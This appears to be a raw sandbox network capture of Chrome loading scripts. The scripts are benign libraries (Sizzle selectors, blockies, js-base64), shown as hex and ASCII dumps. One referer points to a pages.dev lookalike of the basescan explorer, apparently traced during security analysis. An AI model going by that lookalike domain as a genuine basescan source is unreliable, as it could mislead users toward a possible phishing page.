                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 45 78 70 28 22 5e 5c 5c 2e 28 22 20 2b 20 49 20 2b 20 22 29 22 29 2c 20 54 41 47 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 20 2b 20 49 20 2b 20 22 7c 5b 2a 5d 29 22 29 2c 20 41 54 54 52 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 20 2b 20 57 29 2c 20 50 53 45 55 44 4f 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 20 2b 20 46 29 2c 20 43 48 49 4c 44 3a 20 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 20 2b 20 4d 20 2b 20 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 20 2b 20 4d 20 2b 20 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 20 2b 20 4d 20 2b 20
                                                                                                                                                                                                                                              Data Ascii: Exp("^\\.(" + I + ")"), TAG: new RegExp("^(" + I + "|[*])"), ATTR: new RegExp("^" + W), PSEUDO: new RegExp("^" + F), CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + M + "*(even|odd|(([+-]|)(\\d*)n|)" + M + "*(?:([+-]|)" + M +
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 4c 2e 61 70 70 6c 79 28 65 2c 20 4f 2e 63 61 6c 6c 28 74 29 29 20 7d 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 76 61 72 20 6e 20 3d 20 65 2e 6c 65 6e 67 74 68 2c 20 72 20 3d 20 30 3b 20 77 68 69 6c 65 20 28 65 5b 6e 2b 2b 5d 20 3d 20 74 5b 72 2b 2b 5d 29 3b 20 65 2e 6c 65 6e 67 74 68 20 3d 20 6e 20 2d 20 31 20 7d 20 7d 20 7d 20 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 2c 20 65 2c 20 6e 2c 20 72 29 20 7b 20 76 61 72 20 69 2c 20 6f 2c 20 61 2c 20 73 2c 20 75 2c 20 6c 2c 20 63 2c 20 66 20 3d 20 65 20 26 26 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 20 70 20 3d 20 65 20 3f 20 65 2e 6e 6f 64 65 54 79 70 65 20 3a 20 39 3b 20 69 66 20 28 6e 20 3d 20 6e 20 7c 7c 20 5b 5d 2c 20 22 73 74 72 69 6e 67
                                                                                                                                                                                                                                              Data Ascii: ion (e, t) { L.apply(e, O.call(t)) } : function (e, t) { var n = e.length, r = 0; while (e[n++] = t[r++]); e.length = n - 1 } } } function se(t, e, n, r) { var i, o, a, s, u, l, c, f = e && e.ownerDocument, p = e ? e.nodeType : 9; if (n = n || [], "string
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 76 61 72 20 72 20 3d 20 5b 5d 3b 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 20 6e 29 20 7b 20 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 20 2b 20 22 20 22 29 20 3e 20 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 20 26 26 20 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 20 65 5b 74 20 2b 20 22 20 22 5d 20 3d 20 6e 20 7d 20 7d 20 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 20 7b 20 72 65 74 75 72 6e 20 65 5b 53 5d 20 3d 20 21 30 2c 20 65 20 7d 20 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 20 74 72 79 20 7b 20 72 65 74 75 72 6e 20 21 21 65 28 74 29 20 7d 20 63 61 74 63 68 20 28 65 29 20 7b 20 72 65 74 75 72 6e 20 21
                                                                                                                                                                                                                                              Data Ascii: var r = []; return function e(t, n) { return r.push(t + " ") > b.cacheLength && delete e[r.shift()], e[t + " "] = n } } function le(e) { return e[S] = !0, e } function ce(e) { var t = C.createElement("fieldset"); try { return !!e(t) } catch (e) { return !
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 74 75 72 6e 20 65 20 26 26 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 20 26 26 20 65 20 7d 20 66 6f 72 20 28 65 20 69 6e 20 64 20 3d 20 73 65 2e 73 75 70 70 6f 72 74 20 3d 20 7b 7d 2c 20 69 20 3d 20 73 65 2e 69 73 58 4d 4c 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 65 20 26 26 20 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 20 6e 20 3d 20 65 20 26 26 20 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 20 72 65 74 75 72 6e 20 21 59 2e 74 65 73 74 28 74 20 7c 7c 20 6e 20 26 26 20 6e 2e 6e 6f 64 65 4e 61 6d 65 20 7c 7c 20 22 48 54 4d 4c 22 29 20 7d 2c 20 54 20 3d 20
                                                                                                                                                                                                                                              Data Ascii: turn e && "undefined" != typeof e.getElementsByTagName && e } for (e in d = se.support = {}, i = se.isXML = function (e) { var t = e && e.namespaceURI, n = e && (e.ownerDocument || e).documentElement; return !Y.test(t || n && n.nodeName || "HTML") }, T =
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 6d 65 6e 74 42 79 49 64 20 26 26 20 45 29 20 7b 20 76 61 72 20 6e 20 3d 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 20 72 65 74 75 72 6e 20 6e 20 3f 20 5b 6e 5d 20 3a 20 5b 5d 20 7d 20 7d 29 20 3a 20 28 62 2e 66 69 6c 74 65 72 2e 49 44 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 6e 20 3d 20 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 20 6e 65 29 3b 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 20 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 20 26 26 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 20 72 65 74 75 72 6e 20 74 20 26 26 20 74 2e 76 61 6c 75 65 20 3d 3d 3d 20 6e
                                                                                                                                                                                                                                              Data Ascii: mentById && E) { var n = t.getElementById(e); return n ? [n] : [] } }) : (b.filter.ID = function (e) { var n = e.replace(te, ne); return function (e) { var t = "undefined" != typeof e.getAttributeNode && e.getAttributeNode("id"); return t && t.value === n


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              32192.168.2.549765104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC589OUTGET /jss/blockies.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 1897
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=3109
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58859
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkVz%2Bt8h28%2B%2BiyVp8xy2d4ixdxYpF0l%2FGAx0KNWNCgLbhuVCDzamjrNlwHzCUeAsdQDSdmgfbXvVL1RZoAUbLUZvA%2BGDcnlGHD3ZnqXirsz4%2BiSjVHE%2F%2FIixKTdR6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c65ed2423e-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC487INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 61 6e 64 73 65 65 64 3d 6e 65 77 20 41 72 72 61 79 28 34 29 3b 66 75 6e 63 74 69 6f 6e 20 73 65 65 64 72 61 6e 64 28 73 65 65 64 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 72 61 6e 64 73 65 65 64 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 72 61 6e 64 73 65 65 64 5b 69 5d 3d 30 3b 7d 0a 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 65 65 64 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 3d 28 28 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 3c 3c 35 29 2d 72 61 6e 64 73 65 65 64 5b 69 25 34 5d 29 2b 73 65 65 64 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 3b 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 61 6e 64 28 29 7b 76 61 72 20 74 3d 72 61 6e 64 73 65 65 64 5b 30 5d 5e 28 72 61 6e 64 73
                                                                                                                                                                                                                                              Data Ascii: (function(){var randseed=new Array(4);function seedrand(seed){for(var i=0;i<randseed.length;i++){randseed[i]=0;}for(var i=0;i<seed.length;i++){randseed[i%4]=((randseed[i%4]<<5)-randseed[i%4])+seed.charCodeAt(i);}}function rand(){var t=randseed[0]^(rands
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 20 73 3d 28 28 72 61 6e 64 28 29 2a 36 30 29 2b 34 30 29 2b 27 25 27 3b 76 61 72 20 6c 3d 28 28 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 29 2a 32 35 29 2b 27 25 27 3b 76 61 72 20 63 6f 6c 6f 72 3d 27 68 73 6c 28 27 2b 68 2b 27 2c 27 2b 73 2b 27 2c 27 2b 6c 2b 27 29 27 3b 72 65 74 75 72 6e 20 63 6f 6c 6f 72 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 49 6d 61 67 65 44 61 74 61 28 73 69 7a 65 29 7b 76 61 72 20 77 69 64 74 68 3d 73 69 7a 65 3b 76 61 72 20 68 65 69 67 68 74 3d 73 69 7a 65 3b 76 61 72 20 64 61 74 61 57 69 64 74 68 3d 4d 61 74 68 2e 63 65 69 6c 28 77 69 64 74 68 2f 32 29 3b 76 61 72 20 6d 69 72 72 6f 72 57 69 64 74 68 3d 77 69 64 74 68 2d 64 61 74 61 57 69 64 74 68 3b 76 61 72 20 64 61 74 61 3d
                                                                                                                                                                                                                                              Data Ascii: s=((rand()*60)+40)+'%';var l=((rand()+rand()+rand()+rand())*25)+'%';var color='hsl('+h+','+s+','+l+')';return color;}function createImageData(size){var width=size;var height=size;var dataWidth=Math.ceil(width/2);var mirrorWidth=width-dataWidth;var data=
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC41INData Raw: 77 69 6e 64 6f 77 2e 62 6c 6f 63 6b 69 65 73 3d 7b 63 72 65 61 74 65 3a 63 72 65 61 74 65 49 63 6f 6e 7d 3b 7d 29 28 29 3b
                                                                                                                                                                                                                                              Data Ascii: window.blockies={create:createIcon};})();


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              33192.168.2.549763151.101.65.2294435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC370OUTGET /npm/js-base64@3.7.2/base64.mjs HTTP/1.1
                                                                                                                                                                                                                                              Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Length: 10358
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              X-JSD-Version: 3.7.2
                                                                                                                                                                                                                                              X-JSD-Version-Type: version
                                                                                                                                                                                                                                              ETag: W/"2876-yUrHGBJ5dqQYbCUeNhzFBIEaUsc"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Age: 1533003
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              X-Served-By: cache-fra-eddf8230090-FRA, cache-ewr-kewr1740064-EWR
                                                                                                                                                                                                                                              X-Cache: HIT, MISS
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 2f 2a 2a 0a 20 2a 20 20 62 61 73 65 36 34 2e 74 73 0a 20 2a 0a 20 2a 20 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 42 53 44 20 33 2d 43 6c 61 75 73 65 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 20 20 20 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 42 53 44 2d 33 2d 43 6c 61 75 73 65 0a 20 2a 0a 20 2a 20 20 52 65 66 65 72 65 6e 63 65 73 3a 0a 20 2a 20 20 20 20 68 74 74 70 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 42 61 73 65 36 34 0a 20 2a 0a 20 2a 20 40 61 75 74 68 6f 72 20 44 61 6e 20 4b 6f 67 61 69 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 64 61 6e 6b 6f 67 61 69 29 0a 20 2a 2f 0a 63 6f 6e 73 74 20 76 65 72 73 69 6f 6e 20 3d 20 27 33 2e 37
                                                                                                                                                                                                                                              Data Ascii: /** * base64.ts * * Licensed under the BSD 3-Clause License. * http://opensource.org/licenses/BSD-3-Clause * * References: * http://en.wikipedia.org/wiki/Base64 * * @author Dan Kogai (https://github.com/dankogai) */const version = '3.7
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 6f 6e 20 6f 66 20 60 62 74 6f 61 60 0a 20 2a 2f 0a 63 6f 6e 73 74 20 62 74 6f 61 50 6f 6c 79 66 69 6c 6c 20 3d 20 28 62 69 6e 29 20 3d 3e 20 7b 0a 20 20 20 20 2f 2f 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 70 6f 6c 79 66 69 6c 6c 65 64 27 29 3b 0a 20 20 20 20 6c 65 74 20 75 33 32 2c 20 63 30 2c 20 63 31 2c 20 63 32 2c 20 61 73 63 20 3d 20 27 27 3b 0a 20 20 20 20 63 6f 6e 73 74 20 70 61 64 20 3d 20 62 69 6e 2e 6c 65 6e 67 74 68 20 25 20 33 3b 0a 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 62 69 6e 2e 6c 65 6e 67 74 68 3b 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 63 30 20 3d 20 62 69 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 29 20 3e 20 32 35 35 20 7c 7c 0a 20 20 20 20 20 20 20 20 20 20 20 20 28 63 31 20 3d 20
                                                                                                                                                                                                                                              Data Ascii: on of `btoa` */const btoaPolyfill = (bin) => { // console.log('polyfilled'); let u32, c0, c1, c2, asc = ''; const pad = bin.length % 3; for (let i = 0; i < bin.length;) { if ((c0 = bin.charCodeAt(i++)) > 255 || (c1 =
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 75 72 6e 20 5f 62 74 6f 61 28 73 74 72 73 2e 6a 6f 69 6e 28 27 27 29 29 3b 0a 20 20 20 20 7d 3b 0a 2f 2a 2a 0a 20 2a 20 63 6f 6e 76 65 72 74 73 20 61 20 55 69 6e 74 38 41 72 72 61 79 20 74 6f 20 61 20 42 61 73 65 36 34 20 73 74 72 69 6e 67 2e 0a 20 2a 20 40 70 61 72 61 6d 20 7b 62 6f 6f 6c 65 61 6e 7d 20 5b 75 72 6c 73 61 66 65 5d 20 55 52 4c 2d 61 6e 64 2d 66 69 6c 65 6e 61 6d 65 2d 73 61 66 65 20 61 20 6c 61 20 52 46 43 34 36 34 38 20 c2 a7 35 0a 20 2a 20 40 72 65 74 75 72 6e 73 20 7b 73 74 72 69 6e 67 7d 20 42 61 73 65 36 34 20 73 74 72 69 6e 67 0a 20 2a 2f 0a 63 6f 6e 73 74 20 66 72 6f 6d 55 69 6e 74 38 41 72 72 61 79 20 3d 20 28 75 38 61 2c 20 75 72 6c 73 61 66 65 20 3d 20 66 61 6c 73 65 29 20 3d 3e 20 75 72 6c 73 61 66 65 20 3f 20 5f 6d 6b 55 72 69
                                                                                                                                                                                                                                              Data Ascii: urn _btoa(strs.join('')); };/** * converts a Uint8Array to a Base64 string. * @param {boolean} [urlsafe] URL-and-filename-safe a la RFC4648 5 * @returns {string} Base64 string */const fromUint8Array = (u8a, urlsafe = false) => urlsafe ? _mkUri
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 20 7b 73 74 72 69 6e 67 7d 20 55 54 46 2d 31 36 20 73 74 72 69 6e 67 0a 20 2a 2f 0a 63 6f 6e 73 74 20 75 74 6f 62 20 3d 20 28 75 29 20 3d 3e 20 75 2e 72 65 70 6c 61 63 65 28 72 65 5f 75 74 6f 62 2c 20 63 62 5f 75 74 6f 62 29 3b 0a 2f 2f 0a 63 6f 6e 73 74 20 5f 65 6e 63 6f 64 65 20 3d 20 5f 68 61 73 42 75 66 66 65 72 0a 20 20 20 20 3f 20 28 73 29 20 3d 3e 20 42 75 66 66 65 72 2e 66 72 6f 6d 28 73 2c 20 27 75 74 66 38 27 29 2e 74 6f 53 74 72 69 6e 67 28 27 62 61 73 65 36 34 27 29 0a 20 20 20 20 3a 20 5f 54 45 0a 20 20 20 20 20 20 20 20 3f 20 28 73 29 20 3d 3e 20 5f 66 72 6f 6d 55 69 6e 74 38 41 72 72 61 79 28 5f 54 45 2e 65 6e 63 6f 64 65 28 73 29 29 0a 20 20 20 20 20 20 20 20 3a 20 28 73 29 20 3d 3e 20 5f 62 74 6f 61 28 75 74 6f 62 28 73 29 29 3b 0a 2f 2a
                                                                                                                                                                                                                                              Data Ascii: {string} UTF-16 string */const utob = (u) => u.replace(re_utob, cb_utob);//const _encode = _hasBuffer ? (s) => Buffer.from(s, 'utf8').toString('base64') : _TE ? (s) => _fromUint8Array(_TE.encode(s)) : (s) => _btoa(utob(s));/*
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 66 72 6f 6d 43 43 28 28 28 30 78 30 66 20 26 20 63 63 63 63 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 20 3c 3c 20 31 32 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 20 28 28 30 78 33 66 20 26 20 63 63 63 63 2e 63 68 61 72 43 6f 64 65 41 74 28 31 29 29 20 3c 3c 20 36 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 20 28 30 78 33 66 20 26 20 63 63 63 63 2e 63 68 61 72 43 6f 64 65 41 74 28 32 29 29 29 3b 0a 20 20 20 20 20 20 20 20 64 65 66 61 75 6c 74 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 66 72 6f 6d 43 43 28 28 28 30 78 31 66 20 26 20 63 63 63 63 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 20 3c 3c 20 36 29 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: : return _fromCC(((0x0f & cccc.charCodeAt(0)) << 12) | ((0x3f & cccc.charCodeAt(1)) << 6) | (0x3f & cccc.charCodeAt(2))); default: return _fromCC(((0x1f & cccc.charCodeAt(0)) << 6)
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 20 61 74 6f 62 28 5f 74 69 64 79 42 36 34 28 61 73 63 29 29 0a 20 20 20 20 3a 20 5f 68 61 73 42 75 66 66 65 72 20 3f 20 28 61 73 63 29 20 3d 3e 20 42 75 66 66 65 72 2e 66 72 6f 6d 28 61 73 63 2c 20 27 62 61 73 65 36 34 27 29 2e 74 6f 53 74 72 69 6e 67 28 27 62 69 6e 61 72 79 27 29 0a 20 20 20 20 20 20 20 20 3a 20 61 74 6f 62 50 6f 6c 79 66 69 6c 6c 3b 0a 2f 2f 0a 63 6f 6e 73 74 20 5f 74 6f 55 69 6e 74 38 41 72 72 61 79 20 3d 20 5f 68 61 73 42 75 66 66 65 72 0a 20 20 20 20 3f 20 28 61 29 20 3d 3e 20 5f 55 38 41 66 72 6f 6d 28 42 75 66 66 65 72 2e 66 72 6f 6d 28 61 2c 20 27 62 61 73 65 36 34 27 29 29 0a 20 20 20 20 3a 20 28 61 29 20 3d 3e 20 5f 55 38 41 66 72 6f 6d 28 5f 61 74 6f 62 28 61 29 2c 20 63 20 3d 3e 20 63 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29
                                                                                                                                                                                                                                              Data Ascii: atob(_tidyB64(asc)) : _hasBuffer ? (asc) => Buffer.from(asc, 'base64').toString('binary') : atobPolyfill;//const _toUint8Array = _hasBuffer ? (a) => _U8Afrom(Buffer.from(a, 'base64')) : (a) => _U8Afrom(_atob(a), c => c.charCodeAt(0)
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1378INData Raw: 20 3d 20 28 6e 61 6d 65 2c 20 62 6f 64 79 29 20 3d 3e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2c 20 6e 61 6d 65 2c 20 5f 6e 6f 45 6e 75 6d 28 62 6f 64 79 29 29 3b 0a 20 20 20 20 5f 61 64 64 28 27 66 72 6f 6d 42 61 73 65 36 34 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 28 74 68 69 73 29 3b 20 7d 29 3b 0a 20 20 20 20 5f 61 64 64 28 27 74 6f 42 61 73 65 36 34 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 75 72 6c 73 61 66 65 29 20 7b 20 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 28 74 68 69 73 2c 20 75 72 6c 73 61 66 65 29 3b 20 7d 29 3b 0a 20 20 20 20 5f 61 64 64 28 27 74 6f 42 61 73 65 36 34 55 52 49 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20
                                                                                                                                                                                                                                              Data Ascii: = (name, body) => Object.defineProperty(String.prototype, name, _noEnum(body)); _add('fromBase64', function () { return decode(this); }); _add('toBase64', function (urlsafe) { return encode(this, urlsafe); }); _add('toBase64URI', function ()
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC712INData Raw: 20 66 72 6f 6d 55 69 6e 74 38 41 72 72 61 79 2c 0a 20 20 20 20 74 6f 55 69 6e 74 38 41 72 72 61 79 3a 20 74 6f 55 69 6e 74 38 41 72 72 61 79 2c 0a 20 20 20 20 65 78 74 65 6e 64 53 74 72 69 6e 67 3a 20 65 78 74 65 6e 64 53 74 72 69 6e 67 2c 0a 20 20 20 20 65 78 74 65 6e 64 55 69 6e 74 38 41 72 72 61 79 3a 20 65 78 74 65 6e 64 55 69 6e 74 38 41 72 72 61 79 2c 0a 20 20 20 20 65 78 74 65 6e 64 42 75 69 6c 74 69 6e 73 3a 20 65 78 74 65 6e 64 42 75 69 6c 74 69 6e 73 2c 0a 7d 3b 0a 2f 2f 20 6d 61 6b 65 63 6a 73 3a 43 55 54 20 2f 2f 0a 65 78 70 6f 72 74 20 7b 20 76 65 72 73 69 6f 6e 20 7d 3b 0a 65 78 70 6f 72 74 20 7b 20 56 45 52 53 49 4f 4e 20 7d 3b 0a 65 78 70 6f 72 74 20 7b 20 5f 61 74 6f 62 20 61 73 20 61 74 6f 62 20 7d 3b 0a 65 78 70 6f 72 74 20 7b 20 61 74
                                                                                                                                                                                                                                              Data Ascii: fromUint8Array, toUint8Array: toUint8Array, extendString: extendString, extendUint8Array: extendUint8Array, extendBuiltins: extendBuiltins,};// makecjs:CUT //export { version };export { VERSION };export { _atob as atob };export { at


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              34192.168.2.549766104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC591OUTGET /jss/qrcode.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
